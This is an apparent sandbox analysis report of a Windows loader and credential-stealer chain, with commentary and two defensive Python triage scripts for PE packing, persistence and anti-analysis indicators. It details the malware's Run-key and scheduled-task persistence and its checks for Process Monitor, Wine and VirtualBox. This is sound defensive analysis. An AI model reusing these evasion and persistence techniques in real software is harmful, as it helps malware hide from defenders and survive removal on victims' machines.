Source: nss3[1].dll.0.dr Static PE information: section name: .00cfg
Source: softokn3.dll.0.dr Static PE information: section name: .00cfg
Source: softokn3[1].dll.0.dr Static PE information: section name: .00cfg
Source: freebl3.dll.0.dr Static PE information: section name: .00cfg
Source: freebl3[1].dll.0.dr Static PE information: section name: .00cfg
Source: mozglue.dll.0.dr Static PE information: section name: .00cfg
Source: mozglue[1].dll.0.dr Static PE information: section name: .00cfg
Source: RoamingCFCGIIEHIE.exe.0.dr Static PE information: section name:
Source: RoamingCFCGIIEHIE.exe.0.dr Static PE information: section name: .idata
Source: RoamingCFCGIIEHIE.exe.0.dr Static PE information: section name:
Source: RoamingCFCGIIEHIE.exe.0.dr Static PE information: section name: cwtgiuyn
Source: RoamingCFCGIIEHIE.exe.0.dr Static PE information: section name: mrbyzpwc
Source: RoamingCFCGIIEHIE.exe.0.dr Static PE information: section name: .taggant
Source: random[1].exe.0.dr Static PE information: section name: .lowo
Source: random[1].exe.0.dr Static PE information: section name: .nade
Source: userAKKKFBGDHJ.exe.0.dr Static PE information: section name:
Source: userAKKKFBGDHJ.exe.0.dr Static PE information: section name: .idata
Source: userAKKKFBGDHJ.exe.0.dr Static PE information: section name:
Source: userAKKKFBGDHJ.exe.0.dr Static PE information: section name: pcxsfzhs
Source: userAKKKFBGDHJ.exe.0.dr Static PE information: section name: plzfkdac
Source: userAKKKFBGDHJ.exe.0.dr Static PE information: section name: .taggant
Source: explorti.exe.5.dr Static PE information: section name:
Source: explorti.exe.5.dr Static PE information: section name: .idata
Source: explorti.exe.5.dr Static PE information: section name:
Source: explorti.exe.5.dr Static PE information: section name: cwtgiuyn
Source: explorti.exe.5.dr Static PE information: section name: mrbyzpwc
Source: explorti.exe.5.dr Static PE information: section name: .taggant
Source: axplong.exe.8.dr Static PE information: section name:
Source: axplong.exe.8.dr Static PE information: section name: .idata
Source: axplong.exe.8.dr Static PE information: section name:
Source: axplong.exe.8.dr Static PE information: section name: pcxsfzhs
Source: axplong.exe.8.dr Static PE information: section name: plzfkdac
Source: axplong.exe.8.dr Static PE information: section name: .taggant
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0041A9F5 push ecx; ret 0_2_0041AA08
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5DB536 push ecx; ret 0_2_6C5DB549
Source: file.exe Static PE information: section name: .text entropy: 7.814911045179817
Source: RoamingCFCGIIEHIE.exe.0.dr Static PE information: section name: entropy: 7.987749938508856
Source: RoamingCFCGIIEHIE.exe.0.dr Static PE information: section name: cwtgiuyn entropy: 7.952966002632842
Source: random[1].exe.0.dr Static PE information: section name: .text entropy: 7.814911045179817
Source: userAKKKFBGDHJ.exe.0.dr Static PE information: section name: entropy: 7.977259343253602
Source: userAKKKFBGDHJ.exe.0.dr Static PE information: section name: pcxsfzhs entropy: 7.95412617888117
Source: explorti.exe.5.dr Static PE information: section name: entropy: 7.987749938508856
Source: explorti.exe.5.dr Static PE information: section name: cwtgiuyn entropy: 7.952966002632842
Source: axplong.exe.8.dr Static PE information: section name: entropy: 7.977259343253602
Source: axplong.exe.8.dr Static PE information: section name: pcxsfzhs entropy: 7.95412617888117
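The static PE lines above are the cheap checks that give the packer away before anything runs: section names no compiler emits (empty names, cwtgiuyn, mrbyzpwc, pcxsfzhs, plzfkdac, .lowo, .nade, and .taggant, the section appended by packers that carry an IEEE Taggant), an entry point sitting in .taggant rather than .text, sections that are both writable and executable, per-section entropy above 7.9, and a header CheckSum that no longer matches the file. The "vs" pairs compare section rights between the dumped in-memory image and the original, which is how the report notices code being rewritten at runtime. A wrong checksum never stops a user-mode binary from loading (Windows enforces it only for drivers and a few system images), so it indicates post-link patching rather than a broken file. Two caveats for triage: .didat (delay-import data) and .00cfg (a Control Flow Guard section emitted by clang/LLVM builds) on the dropped DLLs are ordinary names, and those DLLs (nss3, softokn3, freebl3, mozglue, msvcp140, vcruntime140) are legitimate Mozilla NSS and Visual C++ runtime libraries that stealers of this family fetch so they can decrypt Firefox's saved logins; the indicator is their appearance next to a stealer, not the files themselves. The script below is an added example, not the report's or the malware's code: it parses the section table, renders E/R/W rights, computes Shannon entropy and recomputes the PE checksum with the standard library only, and runs on a PE32 built in build_sample_pe(), which is constructed for the demo and is not the analysed file. KNOWN_SECTIONS is an assumed allow-list, not something the report defines.

```python
# Added example, not the report's or the malware's code: static PE triage with the standard
# library only. build_sample_pe() constructs a demo PE32; it is not the analysed sample.
import hashlib
import math
import struct
from collections import Counter

# IMAGE_SECTION_HEADER.Characteristics bits (winnt.h)
IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE = 0x00000020, 0x20000000
IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE = 0x40000000, 0x80000000
# Assumed allow-list of section names a normal MSVC/clang/MinGW build may carry.
KNOWN_SECTIONS = {".text", ".rdata", ".data", ".idata", ".rsrc", ".reloc", ".tls", ".bss", ".didat", ".00cfg"}

def shannon_entropy(data: bytes) -> float:
    """Bits per byte: near 0 for repetitive data, near 8.0 for compressed or encrypted data."""
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values()) if n else 0.0

def flags_to_str(characteristics: int) -> str:
    """Section rights as E/R/W, the notation the report uses."""
    bits = ((IMAGE_SCN_MEM_EXECUTE, "E"), (IMAGE_SCN_MEM_READ, "R"), (IMAGE_SCN_MEM_WRITE, "W"))
    return "".join(letter for bit, letter in bits if characteristics & bit)

def pe_checksum(data: bytes, checksum_offset: int) -> int:
    """Recompute IMAGE_OPTIONAL_HEADER.CheckSum (the imagehlp CheckSumMappedFile arithmetic).
    checksum_offset is dword aligned for any e_lfanew a linker writes."""
    padded, total = data + b"\0" * (-len(data) % 4), 0
    for off in range(0, len(padded), 4):
        if off == checksum_offset:
            continue  # the stored CheckSum dword is excluded from its own sum
        total += struct.unpack_from("<I", padded, off)[0]
        if total >= 1 << 32:
            total = (total & 0xFFFFFFFF) + (total >> 32)
    total = (total & 0xFFFF) + (total >> 16)
    return ((total + (total >> 16)) & 0xFFFF) + len(data)

def parse_pe(pe: bytes) -> dict:
    """Read the section table, find the entry point's section and compare checksums."""
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[:2] != b"MZ" or pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE image")
    nsections = struct.unpack_from("<H", pe, e_lfanew + 6)[0]
    opt_size = struct.unpack_from("<H", pe, e_lfanew + 20)[0]
    opt = e_lfanew + 24                                     # IMAGE_OPTIONAL_HEADER
    entry_rva = struct.unpack_from("<I", pe, opt + 16)[0]
    sections, entry_section = [], None
    for i in range(nsections):
        hdr = opt + opt_size + 40 * i                       # IMAGE_SECTION_HEADER i
        name = pe[hdr:hdr + 8].rstrip(b"\0").decode("latin-1")
        vsize, va, raw_size, raw_ptr = struct.unpack_from("<IIII", pe, hdr + 8)
        characteristics = struct.unpack_from("<I", pe, hdr + 36)[0]
        if va <= entry_rva < va + max(vsize, raw_size):
            entry_section = name
        sections.append({"name": name, "flags": flags_to_str(characteristics),
                         "entropy": shannon_entropy(pe[raw_ptr:raw_ptr + raw_size])})
    return {"sections": sections, "entry_section": entry_section,
            "checksum_header": struct.unpack_from("<I", pe, opt + 64)[0],
            "checksum_computed": pe_checksum(pe, opt + 64)}

def triage(pe: bytes) -> list:
    """Findings in the spirit of the report's static PE lines."""
    info, findings = parse_pe(pe), []
    for s in info["sections"]:
        label = repr(s["name"]) if s["name"] else "<empty name>"
        if s["name"] not in KNOWN_SECTIONS:
            findings.append(f"unusual section name {label}")
        if "E" in s["flags"] and "W" in s["flags"]:
            findings.append(f"section {label} is writable and executable ({s['flags']})")
        if s["entropy"] > 7.0:
            findings.append(f"section {label} entropy {s['entropy']:.2f} (packed or encrypted)")
    if info["entry_section"] != ".text":
        findings.append(f"entry point is in section {info['entry_section']!r}, not .text")
    if info["checksum_header"] and info["checksum_header"] != info["checksum_computed"]:
        findings.append("header checksum 0x%x differs from computed 0x%x (patched after linking)"
                        % (info["checksum_header"], info["checksum_computed"]))
    return findings

def with_correct_checksum(pe: bytes) -> bytes:
    """Copy of the image with CheckSum rewritten, as a linker or signtool leaves it."""
    off, out = struct.unpack_from("<I", pe, 0x3C)[0] + 24 + 64, bytearray(pe)
    struct.pack_into("<I", out, off, pe_checksum(pe, off))
    return bytes(out)

def build_sample_pe(header_checksum: int = 0x1CD2F9) -> bytes:
    """Constructed demo PE32: plain .text, an unnamed RWX section of random-looking bytes and a
    .taggant section holding the entry point; CheckSum is set to an arbitrary wrong value."""
    rwx = IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE
    bodies = [(b".text", b"\x90" * 0x100 + b"\xc3" * 0x100, rwx & ~IMAGE_SCN_MEM_WRITE),
              (b"", b"".join(hashlib.sha256(b"demo%d" % i).digest() for i in range(16)), rwx),
              (b".taggant", b"\xcc" * 0x10 + b"\x33\xc0\xc3" + b"\0" * 0x1ED, rwx)]
    align, dos = 0x200, b"MZ".ljust(0x3C, b"\0") + struct.pack("<I", 0x40)   # e_lfanew = 0x40
    coff = struct.pack("<HHIIIHH", 0x14C, len(bodies), 0, 0, 0, 0xE0, 0x0102)
    opt = bytearray(0xE0)
    struct.pack_into("<H", opt, 0, 0x10B)                       # PE32 magic
    struct.pack_into("<I", opt, 16, 0x3010)                     # AddressOfEntryPoint -> .taggant
    struct.pack_into("<III", opt, 28, 0x400000, 0x1000, align)  # ImageBase, Section/FileAlignment
    struct.pack_into("<III", opt, 56, 0x4000, align, header_checksum)  # SizeOfImage, SizeOfHeaders, CheckSum
    struct.pack_into("<I", opt, 92, 16)                         # NumberOfRvaAndSizes
    table = b"".join(struct.pack("<8sIIIIIIHHI", name, len(body), 0x1000 * (i + 1), len(body),
                                 align * (i + 1), 0, 0, 0, 0, chars)
                     for i, (name, body, chars) in enumerate(bodies))
    headers = (dos + b"PE\0\0" + coff + bytes(opt) + table).ljust(align, b"\0")
    return headers + b"".join(body for _, body, _ in bodies)

if __name__ == "__main__":
    for finding in triage(build_sample_pe()):
        print(finding)
```

Run it as a script to print the findings for the constructed sample, or call triage(open(path, "rb").read()) on a dropped file. Entropy above 7 in a section a compiler named (.text at 7.81 on file.exe and random[1].exe above) is the compressed-original-code pattern; read it together with the checksum mismatch as one packing finding rather than two independent ones.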
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\vcruntime140[1].dll
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\nss3.dll
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\mozglue.dll
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\userAKKKFBGDHJ.exe
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\nss3[1].dll
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\msvcp140.dll
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[1].exe
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\msvcp140[1].dll
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\freebl3[1].dll
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\freebl3.dll
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe File created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
Source: C:\Users\userAKKKFBGDHJ.exe File created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\softokn3[1].dll
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\vcruntime140.dll
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\mozglue[1].dll
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\softokn3.dll
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\nss3.dll
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\mozglue.dll
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\msvcp140.dll
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\freebl3.dll
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\vcruntime140.dll
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\softokn3.dll

Boot Survival

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run bdb44f72d9.exe
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 624f4d727e.exe
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\userAKKKFBGDHJ.exe Window searched: window name: FilemonClass
Source: C:\Users\userAKKKFBGDHJ.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\userAKKKFBGDHJ.exe Window searched: window name: RegmonClass
Source: C:\Users\userAKKKFBGDHJ.exe Window searched: window name: FilemonClass
Source: C:\Users\userAKKKFBGDHJ.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\userAKKKFBGDHJ.exe Window searched: window name: Regmonclass
Source: C:\Users\userAKKKFBGDHJ.exe Window searched: window name: Filemonclass
Source: C:\Users\userAKKKFBGDHJ.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe File created: C:\Windows\Tasks\explorti.job
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 624f4d727e.exe
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 624f4d727e.exe
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run bdb44f72d9.exe
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run bdb44f72d9.exe
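Boot Survival in this chain: the loader stage (explorti.exe and axplong.exe, which share checksums and section layout with RoamingCFCGIIEHIE.exe and userAKKKFBGDHJ.exe and are those files re-dropped under %TEMP%\<hex>\) registers the downloaded payloads 624f4d727e.exe and bdb44f72d9.exe as HKCU Run values, and its parent additionally writes C:\Windows\Tasks\explorti.job, a Task Scheduler 1.0 format task that lives outside System32\Tasks and is worth listing explicitly when hunting persistence. That gives two independent autostart paths, so removing the Run values alone leaves the .job in place. The FindWindow probes for FilemonClass, RegmonClass and PROCMON_WINDOW_CLASS (the Sysinternals monitor window classes, tried in both capitalisations) show every stage of the chain checking whether Process Monitor is running; how it reacts is not visible in this section, but a detonation box with ProcMon open should expect to record less. The "Process information set" lines further down are the sandbox's rendering of SetErrorMode calls. SEM_NOOPENFILEERRORBOX is used as a weak sandbox check (set it, read back the previous mode, abort if the value was not honoured) but also by any program that wants to suppress error dialogs, and the many WerFault.exe entries are Windows Error Reporting handling the payloads' own crashes, not malware activity. The Python below is an added example, not the report's or the malware's code: it reduces lines in the report's "Source: <process> <event>" shape to persistence and anti-analysis verdicts. SAMPLE_LINES holds a few lines copied from this report; the regexes, the MONITOR_WINDOWS set and the WerFault allow-list are my assumptions about the format and the benign noise, not something Joe Sandbox defines.

```python
# Added example (not the report's or the malware's code): reduce "Source: <process> <event>"
# behaviour lines to persistence / anti-analysis verdicts. Standard library only.
import re
from collections import Counter, defaultdict

# Assumed line shapes, derived from the report lines above.
SOURCE = re.compile(r"^Source: (\S+) (.*)$")
RUN_KEY = re.compile(r"Registry value created or modified: (HKEY_\S+\\Run) (\S+)")
TASK_JOB = re.compile(r"File created: (C:\\Windows\\Tasks\\\S+\.job)")
WINDOW = re.compile(r"Window searched: window name: (\S+)")
ERROR_MODE = re.compile(r"Process information set: ([A-Z]+(?: \| [A-Z]+)*)")

# Window classes registered by Sysinternals Process Monitor, Filemon and Regmon; a process
# that asks FindWindow for them is checking whether it is being watched.
MONITOR_WINDOWS = {"PROCMON_WINDOW_CLASS", "FILEMONCLASS", "REGMONCLASS"}
# Windows Error Reporting changes its own error mode for every crash it handles; that is
# normal and must not be scored as evasion (assumed allow-list).
BENIGN_ERROR_MODE = {"WERFAULT.EXE"}

# Lines copied from the report above (trailing "Jump to behavior" link text left in place).
SAMPLE_LINES = r"""
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run bdb44f72d9.exe
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 624f4d727e.exe
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 624f4d727e.exe
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe File created: C:\Windows\Tasks\explorti.job Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
"""


def summarize(lines):
    """Group events by process; Run-key entries are de-duplicated but keep their order."""
    autostart, task_jobs = [], []
    windows = defaultdict(Counter)      # process -> {WINDOW CLASS: FindWindow calls}
    error_mode = Counter()              # (process, flags) -> calls
    for raw in lines:
        m = SOURCE.match(raw.strip())
        if not m:
            continue
        proc, event = m.groups()
        run, job = RUN_KEY.search(event), TASK_JOB.search(event)
        win, mode = WINDOW.search(event), ERROR_MODE.search(event)
        if run:
            entry = (proc, run.group(1), run.group(2))
            if entry not in autostart:
                autostart.append(entry)
        elif job:
            task_jobs.append((proc, job.group(1)))
        elif win:
            windows[proc][win.group(1).upper()] += 1   # RegmonClass and Regmonclass are one probe
        elif mode:
            error_mode[(proc, mode.group(1))] += 1
    return {"autostart": autostart, "task_jobs": task_jobs,
            "windows": dict(windows), "error_mode": error_mode}


def verdicts(summary):
    """Human-readable findings; returned rather than printed so they can be checked."""
    out = []
    for proc, key, value in summary["autostart"]:
        out.append(f"persistence: {proc} registered {value} under {key}")
    for proc, path in summary["task_jobs"]:
        out.append(f"persistence: {proc} dropped scheduled-task job {path}")
    for proc, hits in summary["windows"].items():
        probed = sorted(MONITOR_WINDOWS & set(hits))
        if probed:
            out.append(f"anti-analysis: {proc} probed for {', '.join(probed)} "
                       f"({sum(hits.values())} FindWindow calls)")
    for (proc, flags), n in summary["error_mode"].items():
        if proc.rsplit("\\", 1)[-1].upper() in BENIGN_ERROR_MODE:
            continue   # crash handler noise, see BENIGN_ERROR_MODE
        if "NOOPENFILEERRORBOX" in flags:
            out.append(f"error-mode (weak evasion signal): {proc} set SEM_NOOPENFILEERRORBOX {n}x")
    return out


if __name__ == "__main__":
    for line in verdicts(summarize(SAMPLE_LINES.splitlines())):
        print(line)
```

Feed it the whole behaviour section (one report line per string) to get one persistence line per Run value and .job file, one anti-analysis line per process that probed the monitor classes, and error-mode lines only for processes outside the allow-list; the de-duplication matters because the report repeats the same Run-key event under several signatures.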
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004195E0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_004195E0
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userAKKKFBGDHJ.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX (5 identical events, collapsed)
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX (50 identical events, collapsed)
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX (5 identical events, collapsed)
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX (50 identical events, collapsed)
Source: C:\Users\user\AppData\Local\Temp\1000017001\bdb44f72d9.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000017001\bdb44f72d9.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000017001\bdb44f72d9.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX (3 identical events, collapsed)
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX (42 identical events, collapsed)
Source: C:\Users\user\AppData\Local\Temp\1000017001\bdb44f72d9.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\file.exe Evasive API call chain: GetUserDefaultLangID, ExitProcess
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\RoamingCFCGIIEHIE.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\userAKKKFBGDHJ.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\userAKKKFBGDHJ.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
